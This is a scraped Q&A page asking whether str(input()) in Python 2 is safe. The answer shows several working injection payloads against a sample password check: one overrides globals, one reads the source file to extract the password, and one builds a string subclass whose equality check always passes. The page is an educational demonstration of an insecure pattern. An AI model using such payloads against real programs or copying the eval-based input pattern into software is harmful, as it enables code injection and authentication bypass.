Logo Questions Linux Laravel Mysql Ubuntu Git Menu
HTML CSS JAVASCRIPT SQL PYTHON PHP BOOTSTRAP JAVA JQUERY R React Kotlin
 

Is input() safe to use if you cast it as a string?

Tags:

python

input

python-2.7

I've been experimenting with python 2.7's input() function and trying to find ways to exploit it. I know that by itself it's vulnerable to exploitation because you can input python expressions, which will then be evaluated. My question is, if you cast it as a string, ie: 

str(input())

is it still vulnerable to these exploits? Does this make it completely safe?

As an example, given the following program, is there any way to exploit input() and make it output "RIGHT password"?

import random
inp = str(input("Enter the password: "))
password = random.randint(0, 100)
if inp == password:
    print "RIGHT password" 
else:
    print "WRONG password"
like image 845
T. Owens Avatar asked Dec 03 '22 22:12

T. Owens

1 Answers

is there any way to exploit input() and make it output "RIGHT password"?

Yep:

C:\Users\Kevin\Desktop>py -2 test.py
Enter the password: __import__('sys').stdout.write('RIGHT password') or exit(0)
RIGHT password
C:\Users\Kevin\Desktop>

"But that doesn't count because you're printing your own output and terminating early", you protest hypothetically. "Show me an example where the conditional actually executes".

C:\Users\Kevin\Desktop>py -2 test.py
Enter the password: (1, globals().update({"random": type("", (object,), {"__init__": lambda self: setattr(self, "randint", lambda x,y: "1")})()}))[0]
RIGHT password

C:\Users\Kevin\Desktop>

"Ok, well, in a real application I wouldn't be using random.randint to determine the password. Show me an example where the conditional inp == "hunter2": passes"

import random
inp = str(input("Enter the password: "))
if inp == "hunter2":
    print "RIGHT password" 
else:
    print "WRONG password"

 

C:\Users\Kevin\Desktop>py -2 test.py
Enter the password: __import__("re").search(r"if inp == \"(.*?)\"", open(__file__).read()).group(1)
RIGHT password

"That doesn't count because you read the file. Show me an example where you don't extract the password from the source code"

C:\Users\Kevin\Desktop>py -2 test.py
Enter the password: type("", (str,), {"__str__": lambda self: self, "__eq__": lambda self, other: True})()
RIGHT password

C:\Users\Kevin\Desktop>
like image 96
Kevin Avatar answered Dec 11 '22 17:12

Kevin
Sign in to Comment

Related questions

Haskell slower than Python in naïve integer factorization?
How to convert a grayscale image into a list of pixel values?
Add a new column and insert specific values according to an defined intervall in python
Find index of first element in array close to float within tolerance, with numpy
How to Read .txt in Pandas
What would be Python/pandas equivalent of this R code for rearranging columns of a dataframe? [duplicate]
python - can't install psycopg2 on centos 7
Getting the href of <a> tag which is in <li>
Python, Kivy, "AssertionError: None is not callable" Error on function call by button
Upload CSV file into Microsoft Azure storage account using python
Replace language specific characters in python with English letters
Django 1.10: base_site.html override not working
scrapy: 'module' object has no attribute 'OP_SINGLE_ECDH_USE'
How to replicate a list a certain number of times [duplicate]
Numpy Covariance Matrix numpy.cov
Matplotlib will not show a polygon plot centered by default?
Can you embed a try in a Python list comprehension?
How to plot multiple density plots on the same figure in python
Nested for-loop: why is the inner loop only executed once?
Python close a thread on multithreading [duplicate]

Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!